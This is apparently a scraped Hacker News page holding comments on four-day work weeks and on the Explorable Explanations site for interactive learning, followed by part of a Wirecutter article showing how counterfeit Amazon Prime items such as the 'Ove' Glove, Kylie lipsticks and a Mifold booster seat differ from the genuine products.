Anecdotal, but I've experienced the opposite where the greed seemed to come more from fellow employees rather than managers. Five day weeks meant breakfast breaks as soon as the group came in on Friday, long lunches, and people mentally checking out early. When we switched to shorter weeks this just shifted to Thursday. After productivity was hurting management was met with a near mutiny attitude at the thought of going back to 5 day weeks.

Point being, I think there's something to be said for company culture in making this work

kosii(10000) 4 days ago [-]

I'm a software engineer, I started working 4 days/32 hours per week about a month ago, and I couldn't be happier :)

perfunctory(1637) 4 days ago [-]

I started working 4 days/32 hours I think about a decade ago. Never looked back.

ausbah(3900) 4 days ago [-]

'Natalie Nagele, co-founder and CEO of Wildbit, has heard from other leaders who say it didn't work for them. She says it fails when employees aren't motivated and where managers don't trust employees.'

I would muse that employees usually aren't motivated because they hate their working conditions, usually imposed by shitty managers / company cultures. Managers & companies may complain about 'unproductive' or 'motivated' employees as if its some personal failing of their employees, but news flash people aren't going to care unless they have a reason to care. If you want employees to enjoy their work and actually be motivated to some degree greater than the bare minimum, give them working conditions that they enjoy. Give them retirement benefits, less working hours, less micromanagement, more pay, remote working options, etc.

This is a problem that stems from crappy notions of how work cultures 'ought to be' in America, and can only be solved by destroying those notions and getting rid of the idea 'productivity above all else' in companies.

nathan_compton(4320) 3 days ago [-]

My superficial understanding of capitalism is that the only thing that motivates employees is money. If you want people to be more motivated, give them more money.

polishdude20(10000) 3 days ago [-]

Yeah it's almost as if when you have one hundred people, is everyone lazy? Or are you the one causing the problem?

globular-toast(10000) 3 days ago [-]

Unfortunately some people are just lazy. At my job they introduced 10% time to be used for personal development, but it's been abundantly clear that most employees are simply taking it as holiday.

notjustanymike(10000) 4 days ago [-]

I introduced 'work from home Wednesday' at our company and the reduction in stress is palpable. Hell, I sleep better on Tuesday nights knowing I've got a day of silence lined up. The naysayers quickly fell in line too, once they realized how much more they could get done that day.

bananamerica(10000) 4 days ago [-]

Why Wednesday though?

david-gpu(4278) 4 days ago [-]

Working from home is still working. Working four days a week is entirely different.

kody(4281) 4 days ago [-]

I worked 4x10s when I worked for the Army and it was awesome. 3 day weekends take off so much pressure, and come Sunday night I was starting to feel the itch to get back into work rather than the dreadful feeling that I 'wasted' my weekend. The only work experience that was better than this was 100% flexibility to work remotely and/or flex hours.

So there's my anecdata for you :)

clSTophEjUdRanu(4315) 4 days ago [-]

I worked 9 hour days with every other Friday off and hated it.

stan_rogers(10000) 4 days ago [-]

My best schedule ever was also military, but it was 7-3-7-4: 7 8-hour 'afternoon shift' days, then 3 days off, then 7 8-hour 'day shift' days followed by 4 days off. The 3-day time off was Tuesday-Wednesday-Thursday, and the 4-day was Friday through Monday - and because you were getting off the early shift and going onto the late shift, it seemed like a longer break. Of course, that implies shift work and three crews for 16-hour/7 day coverage. (The 'graveyard shift' was a skeleton crew, and your turn would pop up every four months or so. Air force. It was basically for emergency landings for civil and allied aircraft and such, with some swabbing of the decks for busy work.) The work week was long, but there was plenty of time to get stuff done and to wind down. Hell, you could even cram in a weekend getaway without a lot of stress.

standardUser(10000) 4 days ago [-]

10 hours really seems extreme. I am certain that the vast majority of office workers could produce the same level of output at a 4x9 schedule as they do in a 5x8 or would in a 4x10.

And most would be profoundly happier people.

monknomo(10000) 4 days ago [-]

4x10s are tough for me, but the 5-4-9 plan (5 9 hour days one week, 3 nine hour days the next week followed by one 8 hour day - basically alternating 3 day weekends) are pretty nice in my book

mikkergp(10000) 4 days ago [-]

I don't know if I'm pro a 4-day work week, (I'm personally not for it if it's 4x10 instead of 5x8)

But I'm reading the book [peak performance](https://www.amazon.com/Peak-Performance-Elevate-Burnout-Scie...) (Highly recommended) and I generally think that companies should really encourage those employees to work at a schedule that works best for them (This is obviously harder for shift work where the value comes from having a person in a chair at certain times)

We have all these norms about 8 hour days, and 5 day weeks and not sleeping at work, and I think people should be given the freedom to work in the way that works best for them.

One norm I'm trying to get used to breaking right now is the norm about 'sleeping at work'. I would be much more productive if I napped for 15 or so minutes twice a day. I know that when it comes to coding or writing I could get a ton done in a 3-4 1-hour-sessions day if those 3-4 hours were clear, well defined and rested. I could get much more done in '3-4 hours' than an '8 hour day' with meetings and other administrivia thrown in. I'd guess my optimal work week is somewhere around 26 hours, assuming that the space between those 26 hours is spent resting and focusing and getting ready to work hard those 26 hours.

Darkphibre(10000) 4 days ago [-]

> Nap time adds to productivity

Amen to this! I pushed for, and saw implemented, a dual nap room for our studio. It was used around the clock by people stretching, meditating, and napping. I found a huge productivity spike taking out 20 minutes a day.

Then, we hired a bunch more people for the upcoming launch, and it was re-purposed into a storage room for old rack hardware (I pushed against this, but was told it was a temporarily unavoidable allocation for the space... meanwhile, the dedicated Lego room sits unused 38 hours a week). So we lost the nap room right as we enter our year of crunch.

Boggles the mind.

Ah well. Have an interesting read on recent research into the commonality of four (rather than two) chronotypes (which I'd used in laying out my position): https://www.sciencedirect.com/science/article/pii/S019188691...

timwaagh(10000) 4 days ago [-]

honestly would be pretty bad for singles who just want to hustle and make some money to afford plans later in life. i can see the appeal for families to take some time off, but currently there are enough facilities for dad-days and the like (at least, where i am). yes you need to pay for those, as is only fair. If this becomes law i'd guess the 'solution' for a lot of people would be to take two jobs. suddenly these plans dont look so amazing anymore.

deadbunny(4024) 4 days ago [-]

I don't follow your logic. If you're working 4x8 rather than 5x8 for the same pay (as discussed in the article) you are not losing any money and have another whole day to 'hustle'.

perfunctory(1637) 4 days ago [-]

In a world where no one is compelled to work more than four hours a day, every person possessed of scientific curiosity will be able to indulge it, and every painter will be able to paint without starving, however excellent his pictures may be. Young writers will not be obliged to draw attention to themselves by sensational pot-boilers, with a view to acquiring the economic independence needed for monumental works, for which, when the time at last comes, they will have lost the taste and capacity. Men who, in their professional work, have become interested in some phase of economics or government, will be able to develop their ideas without the academic detachment that makes the work of university economists often seem lacking in reality. Medical men will have the time to learn about the progress of medicine, teachers will not be exasperatedly struggling to teach by routine methods things which they learnt in their youth, which may, in the interval, have been proved to be untrue.

-- Bertrand Russell

http://www.zpub.com/notes/idle.html

jariel(4316) 4 days ago [-]

This is a funny kind of bubble quote, by someone I think out of touch with most people.

I believe most people would watch TV, play cards, play video games. This is what they already do with their spare time, there's no reason to believe there wouldn't be more of it.

It's amazing what a 'schedule' and 'working with others' and 'requirements' and 'deadlines' can do - it brings people to life and is probably the only way hard things get done.

For a certain kind of person, some free time would lead to a lot of exploration but for most people it would not.

hinkley(4219) 4 days ago [-]

Many of us work in spaces where servers are expected to be working and running 24/7. Yet our bosses still want every single employee to have butts in seats 9:00 am to 5 pm, 5 days a week and in the same time zone. Sometimes with a little guilt-tripping on the side for taking sick days and vacation.

Wouldn't we be better off with several shifts, 4 days a week, covering Monday through Saturday or even the entire week?

wolco(3776) 4 days ago [-]

Mature places have this with a global workforce.

Not so mature places put 9-5ers on call with a tiny bump in pay.

mjayhn(10000) 4 days ago [-]

I can't begin to explain how much less stress I encounter in day to day life having just one week day to stay home. Just having a day to be able to easily knock out chores between Jira issues; drop the car off at the dealer, sell something on craigslist, complete a house project, go to the dentist, meet the handyman, go to the bank, etc is so nice.

All of these things wind up on the back burner when I'm in the middle of high stress projects and forced to sit at a desk for 8-10 hours a day.

All that does is lead to more stress because now I'm falling behind on my life tasks and have to burn a weekend catching up when I should be able to spend that weekend de-stressing.

I know not everyone is as sapped for energy as I am after work, I hate that I'm this way. But after leaving work and siting in an hour of traffic my energy is just sapped from me by the time I make it home. I have enough energy to feed myself and sometimes work out to maintain my health..

GordonS(467) 4 days ago [-]

Around 5 years back, I went from 5 days a week to 4, taking a 20% paycut in the process.

It was one of the best decisions I've ever made - it feels like I have so much more time for family, side projects and hobbies than I ever did before. And for reference, I work around 90% from home.

TBH, the company I work for has got a pretty good deal out of this, as I'm sure my productivity hasn't dropped at all. (it's a mega corp, so there is zero chance of negotiating back to equivalent of a 5-day salary)

david-gpu(4278) 4 days ago [-]

> Just having a day to be able to easily knock out chores between Jira issues

This seems to conflate working from home with having time off. Is your employer paying you to work on that day or not?

I work four days a week (30 hours). On my days off, I do not work at all. On my days on, I do not do random house chores during office hours. That's what my employer and I agreed to, and I think it describes what most people understand as a four day workweek.

rverghese(10000) 4 days ago [-]

But doesn't this rely on everyone else working 5 days?

If everyone had a 4-week, it would be just like the current weekend. You can't go to the bank or dentist, because they would also be off.

Perhaps you could get the same effect and quality of life by taking Sunday and Monday as your days off and working Saturday.

Eoan(4255) 4 days ago [-]

Obligatory link to solution that would let working less be something that would not deserve a news story: https://i.imgur.com/ia2s7AM.png

erik_landerholm(4017) 4 days ago [-]

Do you actually like your job? I don't mean any disrespect, but I've had jobs I don't really like and I get where you are coming from. Right now, though and at other times, since I've had my own companies, 6 day work weeks and 10-12 hrs a day was not even an issue. I feel like if people go to 4 day work weeks, people that love their jobs and are willing to work 1.5times as much or more will have a huge advantage over the long haul.

cortesoft(10000) 4 days ago [-]

It is an especially big deal for working parents... having a day when kids are at school/daycare to do chores and errands is huge... so many things are impossible to do when you are chasing kids around. I get way more done on a weekday home than a weekend.

systemtest(4000) 4 days ago [-]

I did it a bit different. For 2020, working four days gives me 204 workable days per year. Working five days gives me 255 workable days per year.

What I do is that I work five days a week and around June-July I take ten weeks off. I have the same amount of working days per year with the same income but it feels like a godsend to have a yearly sabbatical of over 2 months during the best weather of the year. It reminds me of being in school again with the long summer holidays.

If I ever have children that means being with them for six weeks fully dedicated to them.

axaxs(10000) 4 days ago [-]

Honestly, it just sounds like your job is too stressful. I work 5 days a week, sometimes more, but nobody bats an eye if I need to go somewhere 2 or 3 hours in the middle of the day. I much prefer this to 4 full time days. 5 days of less stress gives you more availability and more flexibility at the same time. I feel it's what we should really be striving for.

davidajackson(4225) 4 days ago [-]

This is why I recently started doing remote work. I just can't justify commuting/time it takes to go somewhere 30+ minutes away.

bytematic(10000) 4 days ago [-]

It's interesting how many of those things rely on certain businesses being open 5 days a week at least.

volkk(4303) 4 days ago [-]

> I know not everyone is as sapped for energy as I am after work, but I leave work and sit in an hour of traffic. My energy is just sapped from me by the time I make it home. I have enough energy to feed myself and sometimes work out to maintain my health..

I know that some people just dont have the privilege of living close to their jobs, but after spending one internship getting up at 5;45am to drive with my dad to work to beat the traffic for 1hr, and then spending 1.5-2 hours driving back in heavy traffic in NYC, I vowed to never ever live in a place where I have to drive that far to get to work. 2 months of that and I was already losing my will to live. My dad did it for 15 years and I can see why towards the last leg of that job, he was bitter and angry on a daily basis. That is not a way to live.

Cyph0n(4264) 4 days ago [-]

I feel exactly the same when it comes to energy, even though I live ~10 mins from work...

As far as work schedule goes, my company/team is fairly flexible when it comes to WFH. However, I still operate in 'work mode' while at home, which makes it difficult to take of chores, etc.

turk73(10000) 4 days ago [-]

I'd say most of us probably are. I am suffering from chronic overwork at this point. I'm thinking of just quitting and taking 6 mos. off and maybe never going back to tech at all. Dow 30 company, total fucking mess.

grappler(4300) 3 days ago [-]

Seconding this, but particularly and especially for tasks that have to be done during normal business hours. If there's some issue I have that requires calling some customer service number, it often gets put off for days or even weeks before I manage to fit it in.

sky_rw(10000) 4 days ago [-]

I encourage everybody to work as little as possible, that way the competition for me is lower.

postsantum(4179) 4 days ago [-]

Many people optimize for life quality, they are not competing with you

ojbyrne(680) 3 days ago [-]

I feel like the "bosses" Should work 4 day weeks. The rest of us would get more done on the 5th day than the other 4 combined.

allset_(10000) 3 days ago [-]

This is the work from home day each week.

KoftaBob(4281) 4 days ago [-]

As another thing to try, how about making the "standard" workday 9-4 instead of 9-5? This way, it ends up being 3 hours of work, 1 hour of lunch, then another 3 hours of work.

It's more balanced, people get an extra hour in their day to spend on themselves, and it seems that for many people, the extra hour from 4-5 is relatively low productivity compared to the rest of the day anyway.

icedchai(4264) 4 days ago [-]

I think it's already that way in many places. You just have to pretend to work for the other hour or two.

amyjess(3259) 4 days ago [-]

Going down to a 32-hour workweek would be lovely, but I'm simply not interested in doing 4×10. I'd rather get home at a decent hour than have an extra day off.

gpanders(10000) 4 days ago [-]

I work from 7-5 each day, so even when I go to the gym or run a quick errand after work I can be home by 6, which strikes me as a 'decent hour', although I suppose that's subjective.

Waking up at 6am takes getting used to but isn't unreasonable in my opinion.

chadlavi(4310) 4 days ago [-]

As knowledge workers (I'm assuming), I feel strongly that the number of hours we spend at work has little correlation to the amount of value we deliver. I could easily get the same amount of value delivered in 4 7-hour days that I currently do in 5 8-ish hour ones. I'm only forced to hang out at work for a certain set of hours because of... tradition I guess?

echelon(4132) 4 days ago [-]

To each their own. My work week is spent on work and I can't really enjoy the time before or after work. I'll never enjoy M-F.

I'd rather have a 4x10 than a 5x8.

If my side hustle ever graduates into a startup and I start hiring other people, we're doing 4x10 or 4x9.

ClikeX(10000) 1 day ago [-]

4x10 would be fine by me if I'd live 10 minutes from work. But I don't think my dog would appreciate being left without a walk for 12 hours.

On 32 hours now and I can handle it financially. As long as that stays the way it is I'm not changing anything.

tombert(4235) 4 days ago [-]

I remember when I interned at Lockheed Martin forever ago, they had a system where you normally work 9-hour days (8 on Fridays), and as a result had every other Friday off. It equated to a 80 hours for every two weeks, and it was really nice if you ever had to go to the bank or DMV (which are typically only open during weekdays).

I always wondered why this wasn't more popular.

aetherson(3601) 4 days ago [-]

Popularly known as the 9-80 schedule. My wife has it, it's really nice to get the Friday off but it makes it rough for her to be at all involved in picking up/dropping off the kids (which is hard even with a normal 8 hour day).

hylaride(10000) 3 days ago [-]

In Canada I've seen this at large companies over the summers for white collar workers.

clSTophEjUdRanu(4315) 4 days ago [-]

Why is this so common in defense?

om42(10000) 4 days ago [-]

9/80 schedules are more popular in defense, at least from what I've seen. There's some unintended consequences (to me) of it. PTO/holidays can get weird, do you get 9 hours of paid time? Do you get 8 and shift your hours? Its mostly a problem when teams have a mix systems and there isn't a standard.

When I was at LM a few years ago, some teams were on a different 9/80 pattern (different Fridays off), and some still on the regular 10/80 schedule. So on Fridays you basically had significantly less people in the office and it was never the person you needed to get work done. Basically made Monday to Thursday the regular working week with Friday being there if you really needed to get work done.

Think the different schedules was a combination of LM employees, employees that were in the union, and external contractors having different contract requirements.

abecedarius(2123) 4 days ago [-]

I used to work 4 days during a contract job with a very long commute. I was made to stop because of a new state law requiring overtime on >8 hours. Thanks, Sacramento.

aaronchall(2460) 3 days ago [-]

I wonder what you'd say to the lawmakers who caused that change...

blobbers(10000) 4 days ago [-]

'Russian Prime Minister Dmitry Medvedev is backing a parliamentary proposal to shift to a four-day week.' -- with all the Russian meddling in the U.S.A., maybe they can get this pushed through!

Jokes aside, I would love this. Right now in tech asking for this sort of thing feels like a 'career limiting move', and definitely in a hiring situation could label you as 'not a hard worker' despite your emphasis on efficiency and productive hours.

blackearl(10000) 4 days ago [-]

If not career limiting, pay limiting. I'd worry that I suddenly get a 20% cut in salary

k__(3390) 4 days ago [-]

I'm from Germany and none of my friends works 40h anymore.

They're all down to 50-80%

This is even regulated by the law, your employer has to allow you to reduce your work time, only in some extreme cases they can deny it.

Works like a charm.

sib(4146) 4 days ago [-]

Is there an English-language description of this law anywhere online? I couldn't find it and would love to learn more. Thanks!

frockington1(4294) 4 days ago [-]

I like the idea of working less, but it's going to be hard to use Germany as a poster child. The German economy hasn't been doing to great recently. In my opinion it's largely due to carrying lagging EU economies, but it will be hard to use a struggling economy as a positive indicator

Germany: https://tradingeconomics.com/germany/gdp-growth US: https://tradingeconomics.com/united-states/gdp-growth

fogetti(4048) 4 days ago [-]

I am curious. Where do they work? What do they do?

kuu(4319) 4 days ago [-]

Do you also get paid a 50-80%?

systemtest(4000) 4 days ago [-]

What about your pension or your company car? If you work an extra day in the week 100% of that money can go straight to your pension, giving you 10 years of early retirement.





Historical Discussions: Explorabl.es (February 19, 2020: 886 points)
Explorable Explanations (September 18, 2018: 3 points)
The Explorable Explanation "Game" Jam Is ON (July 28, 2018: 2 points)
Explorable Explanations (August 20, 2018: 1 points)
The Explorables Jam (July 17, 2018: 1 points)
The Explorable Explanation "Game" Jam – explain an idea through play (July 09, 2018: 1 points)

(890) Explorabl.es

890 points 6 days ago by rickdeveloper in 4129th position

explorabl.es | | comments | anchor

Lion cubs play-fight to learn social skills. Rats play to learn emotional skills. Monkeys play to learn cognitive skills. And yet, in the last century, we humans have convinced ourselves that play is useless, and learning is supposed to be boring.

Gosh, no wonder we're all so miserable.

Welcome to Explorable Explanations, a hub for learning through play! We're a disorganized "movement" of artists, coders & educators who want to reunite play and learning.

Let's get started! Check out these 3 random Explorables:




All Comments: [-] | anchor

lukifer(4318) 6 days ago [-]

Hah, was planning on linking to Nicky Case[0], but of course that's exactly who's behind this! :D

Very exciting project. We're absolutely leaving 'leaving money on the table' by not leveraging the full power of the brain for education and reasoning about complex systems. See also: Bret Victor's 'Ladder of Abstraction' [1], and Kevin Simler's 'Going Critical' [2].

[0] https://ncase.me/

[1] http://worrydream.com/LadderOfAbstraction/

[2] https://meltingasphalt.com/going-critical/

hammerbrostime(3892) 6 days ago [-]

Nicky Case does incredible work. She should be a poster child for Patreon, through which I believe she makes most of her living. https://www.patreon.com/ncase

qqii(4230) 6 days ago [-]

Thank you for highlighting these examples, they've been very insigntful.

ThouYS(4300) 5 days ago [-]

Hadn't heard of Case yet, but Bret Victor is an absolute visionary. His talks "Media for Thinking the Unthinkable" [1] and "The Humane Representation of Thought" [2] are eye-openers!

[1] https://vimeo.com/67076984

[2] https://vimeo.com/115154289

thomasfromcdnjs(2829) 6 days ago [-]

I read the fireflies tutorial and still don't understand how they sync their clocks. What does moving a second forward on the timer do?

zentiggr(10000) 4 days ago [-]

Take an example with only two fireflies. Their clocks won't be at the same point at first, of course.

So one lights up... and the instinct is for the other firefly to try and light up at the same time. How?

Since it was going to light up later than the first fly, it shortens its cycle a little bit and lights up a little sooner.

Repeat that cycle a few times and soon enough, the second fly has 'caught up' and is flashing when the first one does.

Add more fireflies, and its just more of the same. When a nearby firefly lights up, the ones close by speed up a little. Eventually, they all converge on the 'fastest' time.

dev_throw(10000) 6 days ago [-]

The notion that only serious work can educate someone is something I hope future educators can dispel and build engaging platforms (edutainment).

I learned about game theory, communication, teamwork, strategy and business from gaming and sports. These topics would have been quite dry to learn in a sterile educational setting. In the same vein, I hope we move to a more experiment/physical based learning of science and technology over rote learning, since a lot of learners hugely benefit from that.

I commend you on what you're working towards!

lonelappde(10000) 6 days ago [-]

Gaming and sports can be serious, and taking it seriously leads to big gains in learning.

I think you mean 'formal' or 'prim' more than 'serious'.

repsilat(4319) 5 days ago [-]

> The notion that only serious work can educate someone is something I hope future educators can dispel

This sounds super weird to me. I thought rote-learning was totally out of fashion, and now under-practiced because everyone thinks that learning should always be fun.

I don't know whether this is regional variation, age differences or political differences. And I there's probably some middle-ground: maybe you have to memorise your times-tables, but maybe it doesn't need to be boring.

michaelmior(3954) 6 days ago [-]

I haven't put any effort into adding explanations of anything, but looking at the one titled 'Basic Beats' reminded me of this little thing I built a while back for playing around with rhythms in a similar circular way: https://michaelmior.github.io/rhythm-wheel/

stazz1(4102) 6 days ago [-]

Very cool tool! Thanks a lot for linking it. I wonder what sort of sequencer you would build.

jwilber(10000) 5 days ago [-]

Not as explorable per se, but here's an interactive explanation I made for my favorite (and widely useful) method in statistics:

https://www.jwilber.me/permutationtest/

hencq(3521) 5 days ago [-]

Great explanation! I'm now tempted to try this out myself for some experiments. I wish my statistics book in college used these kind of interactive explanations.

AKluge(10000) 6 days ago [-]

I also work in this space, producing interactive content for physics education. I have an evolving framework for visualizing vector fields, such as electric fields. Example content includes an explanation of Gauss's law http://www.vizitsolutions.com/portfolio/gausslaw/, where the graphs, texts, and equations are interactive, and changes to any of them are reflected in all of them.

A truly general framework will be tough, because of the different nature of different types of content. For example, even within physics I am working on a quantum simulation, where the simulation and interactions with it will be very different from the electric field examples. Perhaps for some very general interactions, eventually... I will definitely be evolving in that direction – for example making the electric field models easier to edit.

I have advocated this approach at a number of conferences, but the reception from companies has been lukewarm at best. They are able to sell content with limited interactivity, and the cost for this is comparatively high.

All of this content is founded in correctness, and in research proven instructional design principles, which do include gamification.

BTW, all of the code is openly licensed, and I encourage its reuse and solicit feedback on functionality and future directions.

TuringTest(3135) 5 days ago [-]

>A truly general framework will be tough, because of the different nature of different types of content.

I've been thinking for years what it would take to create a general framework like that, and I think we're in the middle of a language revolution like the one in the 80's, that will end-up creating such new system; all the pieces are in place, it just need one project to integrate the best parts and take off.

My ideal solution would integrate:

- the programming model of a spreadsheet (reactive functional programming), useful for building models;

- interactive graphics like those in explorable explanations, integrated with the data models stored in the spreadsheet;

- a good templating library with a visual designer and auto-generated markup, for building visual components based on the models;

- and an outliner storage model with 'external reference' transcluded nodes, to build and evolve projects from the tool itself, without an external IDE.

Several companies are very close, but none of them include all these pieces, as some of them come from programming language design and others from user interaction; right now, only a very senior interdisciplinary team would know how to integrate all them in a single unified approach.

spyckie2(10000) 6 days ago [-]

What would make explorables really take off is a killer framework to make building them easier, ala Ruby on Rails.

I know ncase has built some frameworks and I applaud his work, but this space just needs a lot more investment.

Here's what I think the killer framework will do really, really well: (Note this is VERY rough, it comes from spending 20 minutes trying to create an explorable a long time ago and realizing that the tooling just isn't right)

- 1) Turn the act of coding a model into mostly verbal reasoning by having a great framework language / API. Rails actually did this, turning the entire building a website into composing english. It greatly reduced the distance between the concepts / app that you were building and how you went about building it - i.e. Model has_many :users

- 2) A standardized convention on inputs, outputs, relationships, defaults, and time (step functions).

- 2b) A standardized convention of defining one unit, populations and groups of units within populations

- 3) Automated scaffolding to display raw data, with add-on libraries to easily scaffold formatted or visual data.

- 3b) Automated scaffold to visualize a unit, a population, groups within populations, and units within groups (a scaffold of a population is like table rows)

- 3c) Language / api should also make it dead simple and intuitive to control converting from numerical data to textual data. i.e. if you are modeling stress, what does 60 points in stress mean?

I think something inspired by ActiveModel (my Rails bias is showing) would be a great way to define the above since defining a strong way to define your data is also how you would get automatic scaffolding language and high level functions on top of it.

- 4) A dead simple way to display and embed models anywhere. 1 line of javascript or a 1 line import and you can plug it into jekyll, hugo, (any static site generator, really)

- 5) A killer tutorial.

TuringTest(3135) 5 days ago [-]

Funny that your #1 requirement, for me, would be turning coding into mostly visual reasoning. Different skillsets, I suppose.

I think of code as laying out the results of a program execution (in terms of changing GUIs or lists of transformed data), and then building up an abstraction that captures all the instances.

So, a visual tool that let me paint examples, and build (named) abstractions that group them, would be my ideal development environment. Spreadsheets are the oldest somewhat supporting this desired workflow, and things like Brett Victor's Ladder of Abstraction or tools like http://aprt.us/ are the next level, but still fall short.

paulgb(2079) 6 days ago [-]

I haven't used it myself, but I wonder if Idyll comes close? https://idyll-lang.org/

mathisonian(3863) 6 days ago [-]

We're working on this with https://idyll-lang.org/, it does some of the things you mention already (standard conventions for how to do common tasks, standard set of widgets, handles loading data, extensible plugin system, etc).

But it is a big undertaking and there is still a lot of work to do. If anyone on HN wants to contribute or give feedback you can reach me at mconlen at cs dot washington dot edu.

TruthSHIFT(10000) 6 days ago [-]

There's so much content there. But, this explanation of particles is pretty great:

https://manytinythings.github.io/

truebosko(4235) 6 days ago [-]

Love the language here. Even see this as a meaningful way to explain concepts to children.

zupreme(4178) 6 days ago [-]

May just be me, but I am getting no audio in the music item when using iOS.

Looks interesting though.

jamil7(4279) 5 days ago [-]

Same on FF on desktop, I think HN might have brought the streaming server to it's knees.





Historical Discussions: Which of these Amazon Prime purchases are real? (February 21, 2020: 819 points)

(833) Which of these Amazon Prime purchases are real?

833 points 4 days ago by zdw in 39th position

thewirecutter.com | Estimated reading time – 19 minutes | comments | anchor

You can probably tell at a glance that a "Chanel" handbag going for $20 at a flea market is fake. But you might not give a second thought to items that arrive on your doorstep via Amazon Prime. With the rise of third-party sellers on Amazon, maybe you should.

Although Amazon has taken many measures to prevent counterfeits and unsafe products from showing up on its site, plenty of fakes still slip through. Over the past several months, we've purchased counterfeits and knockoffs making fraudulent safety claims and encountered a few instances in which a seller switched in an authentic product but from a discontinued or lesser-quality line—all delivered through Amazon Prime. We also obtained authentic items, either directly from the manufacturer or with confirmation from the brand. While the fakes and knockoffs may look like the real products at first glance, they're often lower in quality, sometimes hiding potential health or safety issues.

Many people think that counterfeits and knockoffs are so obviously inferior—visually and otherwise—that it's easy to spot the difference between a fake and the real thing. But increasingly, that's not the case with counterfeits purchased online. Test yourself: Can you spot the real thing in the photos below?

1. The 'Ove' Glove

  • The product listing for the counterfeit 'Ove' Glove looked authentic, with plenty of positive ratings and the coveted "Amazon's Choice" label. This fake was sold by a third-party seller not associated with the manufacturer.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • On the left, the real 'Ove' Glove; on the right, the counterfeit 'Ove' Glove. Photo: Rozette Rago

  • A customer review claiming they received a fake.

  • On the left, the real 'Ove' Glove package; on the right, the counterfeit. Photo: Rozette Rago

  • The product listing for the counterfeit 'Ove' Glove looked authentic, with plenty of positive ratings and the coveted "Amazon's Choice" label. This fake was sold by a third-party seller not associated with the manufacturer.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

The innovative design of The 'Ove' Glove pairs five-finger mobility with heat-proof materials, which helps cooks get a better grip on hot pans. It was an early recommendation on Wirecutter and is made by Joseph Enterprises, a small company based in San Francisco that also produces the as-seen-on-TV Clapper and Chia Pet.

The counterfeit glove, which we purchased from this Amazon page from a third-party seller, looked almost identical to the real thing, with near-perfect packaging. The major differences:

  • The real glove's blue lines were cleaner, and there was a tag inside with material information as well as a loop for hanging. The fake glove arrived with a snag in the weave.
  • The heat protection was slightly better on the real glove, which was thicker and had a longer wrist. The fake glove's painted-on lines gave off a melted-plastic smell when we used it to hold a heated cast-iron pan for 10 seconds.
  • The real glove cost us $5 more than the fake glove, a 50 percent difference.

Although knockoffs are also present on separate Amazon listings, counterfeit 'Ove' Gloves often pop up on the product page for the real 'Ove' Glove, according to Michael Hirsch, vice president of Joseph Enterprises. To combat them, the company buys the fakes and then informs Amazon of the copyright infringement. Getting the fake gloves removed from Amazon can be a long process, Hirsch said, taking weeks or even months of playing whack-a-mole with counterfeit sellers: "Once they're off, they come back under a different brand and name."

It's easy to see why the fakes persist. We found counterfeit 'Ove' Gloves for sale for about $2 a piece in bulk on Alibaba, the photograph clearly showing a knockoff version with black stitching instead of white around the wrist.

The authentic 'Ove' Glove is available for purchase through a page indicating that it is sold and shipped by Amazon.com or sold by Joseph Ent, the Amazon storefront for Joseph Enterprises.

The seller was blocked not long after I purchased the glove, and their storefront no longer exists.

2. Kylie Cosmetics matte lipstick

  • The seller we purchased the counterfeit Kylie kit from is no longer active on Amazon.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • We purchased the genuine Dolce K and Kandy K lipsticks (left) directly from kyliecosmetics.com. We bought the knockoff Dolce K and Kandy K (right) from Amazon. Photo: Rozette Rago

  • A customer review claiming that this product is fake.

  • On the left, Kylie Cosmetics's The OG Lip Trio; on the right, the Amazon-purchased Birthday Edition Kylie Lip Kit, which appears to be an unauthorized fake version of an old kit that is no longer for sale on the Kylie Cosmetics site. Photo: Rozette Rago

  • Left to right: Kylie Cosmetics Dolce K, Amazon Dolce K, Kylie Cosmetics Candy K, Amazon Candy K. The knockoffs had a different color and a plasticky, cloying smell. Photo: Rozette Rago

  • The seller we purchased the counterfeit Kylie kit from is no longer active on Amazon.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

Wildly popular Kylie Cosmetics celebrated Kylie Jenner's 19th birthday in 2016 with Birthday Edition kits in gold packaging that allegedly sold out in less than 30 minutes. Buying a three-year-old lipstick kit in 2019 is gross enough; the idea of putting something totally untraceable that might contain dangerous ingredients or bacteria on my mouth is frightening.

Of course, the 2016 kit is no longer for sale on the Kylie Cosmetics site. We were not able to get confirmation with the brand on the authenticity of the Amazon kit, but the differences between the real Kylie lipsticks and the Amazon version we bought were pretty obvious:

  • The counterfeit lip kit had multiple spelling errors on the list of ingredients, including "Distearoimonium" instead of "Disteardimonium" and "Blsmuth" instead of "Bismuth."
  • The products smelled and looked different. The Amazon-sold Candy K lipstick was a brighter pink than the authentic Kylie Candy K lipstick, while the Amazon-sold Dolce K was more rosy than the authentic version. The formula was equally matte and immovable.
  • The original mini matte kit went for $36, whereas we paid nearly $30 for the version on Amazon.

On Netflix's documentary series Broken, a woman named Khue Nong claims to have purchased a fake Kylie lip kit on eBay that glued her lips together. She resorted to using acetone nail polish remover to unseal her lips.

The Amazon kit we bought was sold by a third-party seller.

3. Child travel booster seat

  • The seller we purchased from no longer lists the knockoff booster seat for sale.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

  • On top, the knockoff YXTDZ portable and foldable child safety seat. At the bottom, the authentic Mifold car booster seat. Photo: Rozette Rago

  • The Mifold (bottom) uses aluminum in its construction, while the YXTDZ seat (top) uses a metallic-colored plastic sticker. Photo: Rozette Rago

  • The seller we purchased from no longer lists the knockoff booster seat for sale.

  • Click the right arrow to see which one is real. Photo: Rozette Rago

Anyone who has had to move a child's car seat from one vehicle to another, or who has attempted to take a kid in a taxi, can immediately understand the appeal of the minimalist Mifold travel booster seat, a patented, Indiegogo-born booster that folds up smaller than an iPad for easy transport from one car to another.

The differences between a knockoff called the YXTDZ portable and foldable child safety seat and the authentic Mifold were easy for us to eyeball:

  • Whereas the Mifold used aluminum to reinforce the seat belt guides, the knockoff had a metallic-colored sticker that mimicked the look of metal. The materials on the YXTDZ felt flimsier.
  • The Mifold's lap-belt guide locked into place in three positions, while the YXTDZ's did not lock in place at all.
  • The Mifold had a label with instructions and safety and manufacture information stitched onto the seat (as required by federal regulation), while the YXTDZ did not.
  • We purchased the YXTDZ seat via a third-party seller with fulfillment by Amazon Prime for nearly $24. The Mifold was about $33, sold and shipped by Amazon.

